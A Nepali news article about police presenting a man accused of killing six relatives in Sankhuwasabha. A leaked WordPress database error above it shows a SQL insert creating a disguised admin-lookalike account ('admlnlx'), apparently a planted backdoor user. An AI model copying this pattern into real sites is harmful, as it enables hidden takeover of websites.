WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BucaNkAbekneN4egAcifqMpWA0LQZt0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:46:34', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । संखुवासभाको मादी नगरपालिका–१ स्थित उम्लिङमा ६ जनाको सामूहिक हत्यामा संलग्न आरोपीलाई प्रहरीले आज सार्वजनिक गरेको छ । प्रदेश–१ प्रहरी कार्यालयका डीआईजी अरुण बिसीले पत्रकार सम्मेलन गरेर आरोपी लोकबहादुर कार्कीलाई सार्वजनिक गरेका हुन् ।
हत्या भएको पाँच दिनपछि प्रहरीले उम्लिङ घर भएका कार्कीलाई पक्राउ गरेको थियो । २६ वर्षीय लोकबहादुर र हत्या गरिएका ५२ वर्षीय तेजबहादुर कार्की काका भतिज हुन् । भदौ २१ मा विहान मादी नगरपालिका–१ घर भएकी आमा पार्वती कार्की, छोरा तेजबहादुर कार्की, बुहारी कमला, नातिनी बुहारी ३२ वर्षीया रञ्जना कार्की, पनाति ८ वर्षका दिपेन कार्की र ५ वर्षीया गोमा कार्कीको हत्या भएको थियो । संघीय प्रहरी इकाइ कार्यालय धरानका एसपी भीम दाहाल, केन्द्रीय अनुसन्धान ब्यूरोबाट खटिएका डिएसपी रुगम कुँवर र संखुवासभाका डिएसपी लालध्वज सुवेदी सहितका अनुसन्धान अधिकृतहरूले हत्या अनुसन्धान गरेका थिए ।
हत्या गरिएका तेजबहादुरले हेपेका कारण’ आफुले आवेगमा हत्या गरेको आरोपी लोकबहादुरले प्रहरीलाई बताएका छन् । मृतक र आरोपी १३ दिनभित्रका काका–भतिजा हुन् । तेजबहादुरका दुईभाई छोरा विदेशमा छन् ।
तेजबहादुर र लोकबहादुरको घर करिब १०० मिटरको फरकमा छ । भदौ २१ मा विहान खेताला खोज्न निस्किएका तेजबहादुरलाई बाटोमा कुरेर बसेका लोकबहादुरले चिर्पटले हिर्काएर हत्या गरेको प्रहरीको अनुसन्धानबाट थाहा खुलेको छ ।